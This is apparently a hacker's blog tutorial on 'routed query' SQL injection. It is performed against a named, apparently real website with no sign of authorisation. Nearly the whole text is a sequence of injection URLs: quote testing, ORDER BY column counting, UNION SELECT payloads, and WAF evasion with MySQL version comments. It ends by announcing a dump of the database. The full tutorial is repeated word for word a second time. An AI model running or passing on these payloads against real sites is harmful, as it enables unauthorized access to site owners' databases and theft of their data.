Hello to all my friends, again im Mr.GonzX
Today i will make an article about SQLi Routed Query
Target site : http://www.jeffreycarbo.com/page.php?name=3
This is the normal page, never mind that error lets imagine that thats the normal page
When i put ' in the parameter i got error like this, remember that the first error is a normal page then i put ' and we got another error means the website is vulnerable for SQLi
http://www.jeffreycarbo.com/page.php?name=3'
Lets balance the query
http://www.jeffreycarbo.com/page.php?name=3'--+-
The error was removed
Lets order by to see how many columns
http://www.jeffreycarbo.com/page.php?name=3'+order+by+2--+-
When i order+by+2 we got error lets try order+by+1
http://www.jeffreycarbo.com/page.php?name=3'+order+by+1--+-
In order+by+1 the error was removed means we have 1 column, the next step is union select
http://www.jeffreycarbo.com/page.php?name=3'+and+0+union+select+1--+-
The website is protected by waff, now lets bypass
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+-
Yes i bypassed the waf but the problem is the vulnerable column is not showing, i used some tricks to get the vulnerable column but not working
name=3 having 1
name=-3
name=(3)
name=3 and 0
name=3 and true
I used that all tricks but not woking :(
So it's time to use SQLi Routed Query :)
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+-
I put the column 1 a single quote and my query like this
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1'--+-
The 1' put inside the double quote and my query like this
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'"--+-
And we got an error means the site is vulnerable to Routed Query :)
Next step is balancing the comment/query
My query like this
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'--+-"--+-
But i got error, lets try union based
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1--"--+-
Yes the error was removed :)
Next step is order by, so i try order by 9 but i got an error and i decreased to 8 and boom the error was removed :)
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+order+by+8--"--+-
Now its time for union select
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+and+0+union+select+1,2,3,4,5,6,7,8--"--+-
But i got waff again :(
Now lets bypass :)
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--"--+-
And Boom!
The vulnerable column is now showing, its time for DIOS :)
Thanks for reading my article :)
U can also visit my Youtube Channel for more tutorials :)
Youtube : Gonz Official
Today i will make an article about SQLi Routed Query
Target site : http://www.jeffreycarbo.com/page.php?name=3
This is the normal page, never mind that error lets imagine that thats the normal page
When i put ' in the parameter i got error like this, remember that the first error is a normal page then i put ' and we got another error means the website is vulnerable for SQLi
http://www.jeffreycarbo.com/page.php?name=3'
Lets balance the query
http://www.jeffreycarbo.com/page.php?name=3'--+-
The error was removed
Lets order by to see how many columns
http://www.jeffreycarbo.com/page.php?name=3'+order+by+2--+-
When i order+by+2 we got error lets try order+by+1
http://www.jeffreycarbo.com/page.php?name=3'+order+by+1--+-
In order+by+1 the error was removed means we have 1 column, the next step is union select
http://www.jeffreycarbo.com/page.php?name=3'+and+0+union+select+1--+-
The website is protected by waff, now lets bypass
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+-
Yes i bypassed the waf but the problem is the vulnerable column is not showing, i used some tricks to get the vulnerable column but not working
name=3 having 1
name=-3
name=(3)
name=3 and 0
name=3 and true
I used that all tricks but not woking :(
So it's time to use SQLi Routed Query :)
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+-
I put the column 1 a single quote and my query like this
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1'--+-
The 1' put inside the double quote and my query like this
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'"--+-
And we got an error means the site is vulnerable to Routed Query :)
Next step is balancing the comment/query
My query like this
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'--+-"--+-
But i got error, lets try union based
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1--"--+-
Yes the error was removed :)
Next step is order by, so i try order by 9 but i got an error and i decreased to 8 and boom the error was removed :)
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+order+by+8--"--+-
Now its time for union select
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+and+0+union+select+1,2,3,4,5,6,7,8--"--+-
But i got waff again :(
Now lets bypass :)
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--"--+-
And Boom!
The vulnerable column is now showing, its time for DIOS :)
Thanks for reading my article :)
U can also visit my Youtube Channel for more tutorials :)
Youtube : Gonz Official
